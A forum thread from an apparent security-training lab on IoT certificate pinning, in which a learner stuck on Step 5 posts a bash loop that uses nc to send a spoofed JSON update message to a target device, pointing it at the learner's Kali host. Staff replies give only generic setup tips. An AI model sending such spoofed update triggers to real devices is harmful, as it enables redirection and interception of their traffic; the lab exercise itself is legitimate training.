Forum Discussion
IoT & Embedded Devices: Certificate Underpinning
I am also stuck on Step 5 and having trouble with the trigger. I have self-signed certs, an HTTP server listening on 443 (bound to 0.0.0.0) as well as a sniffer for anything coming from the target. I have tried to trigger the target to connect using:
for i in {1..5};
do echo '{"Update":"1","ClientId":"AXG1337VFXL","Server Ip":"<KALI_IP>"}' | nc -u <TARGET_IP> 8080;
sleep 2;
done
Can anyone point me in the right direction?
3 Replies
- KieranRowley
Community Manager
Hey struc I see it's been a few days since you asked your question and no one has been able to help yet. Let me ask some of my colleagues for a pointer...
- ChrisKershaw
Community Support
Hey struc
I'm sorry for the delay in responding to your lab issue.
I'm pleased to confirm that the lab is working correctly, I've just tested it, and I was able to retrieve the token for Task 5 successfully.
Firstly, ensure that in the terminal application, you are in the 'Desktop' directory. The command you will need to use this command to open up a new file window: gedit exploit.py
This is where you will need to enter and save the script.
You're welcome to share the script with us in full, and we can check that you have it listed correctly if that will help?
Hopefully, this helps as a starting point with your attempt. - ChrisKershaw
Community Support
Hey struc
I just wanted to check in with you, to ask how you are getting on with your lab attempt? Do you require any further help at all?